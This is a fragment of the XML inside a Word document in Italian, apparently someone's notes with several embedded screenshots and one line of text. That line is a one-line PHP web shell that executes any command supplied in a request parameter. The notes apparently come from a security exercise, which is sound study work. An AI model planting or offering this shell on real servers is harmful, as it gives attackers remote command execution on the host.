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FBB5" w14:textId="54729894" w:rsidR="00CE558F" w:rsidRDefault="00CE558F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A45FDF0" wp14:editId="7188A0C7">
            <wp:extent cx="6115050" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10529710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865E" w14:textId="28AC3561" w:rsidR="00CE558F" w:rsidRDefault="00CE558F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7348991F" wp14:editId="752507E1">
            <wp:extent cx="6115050" cy="4514850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10405526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9C51" w14:textId="77777777" w:rsidR="004D7FF6" w:rsidRDefault="004D7FF6"/>
    <w:p w14:paraId="29BCF143" w14:textId="4A8BB7C7" w:rsidR="004D7FF6" w:rsidRDefault="004D7FF6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D16276E" wp14:editId="357920DD">
            <wp:extent cx="6120130" cy="2789555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1653163107" name="Immagine 1" descr="Immagine che contiene schermata, Software multimediale, softwar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63107" name="Immagine 1" descr="Immagine che contiene schermata, Software multimediale, software, Software per la grafic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FDB5" w14:textId="77777777" w:rsidR="004D7FF6" w:rsidRDefault="004D7FF6"/>
    <w:p w14:paraId="57AEEE0C" w14:textId="0D994795" w:rsidR="004D7FF6" w:rsidRDefault="004D7FF6">
      <w:r w:rsidRPr="004D7FF6">
        <w:t>&lt;?php system($_REQUEST["cmd"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D7FF6">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7FF6">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004D7F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8F"/>
    <w:rsid w:val="004D7FF6"/>
    <w:rsid w:val="00C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6505"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC9C07BC-12DF-4E23-9167-3F520E32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valcavi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>francesco valcavi</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-26T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-26T16:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>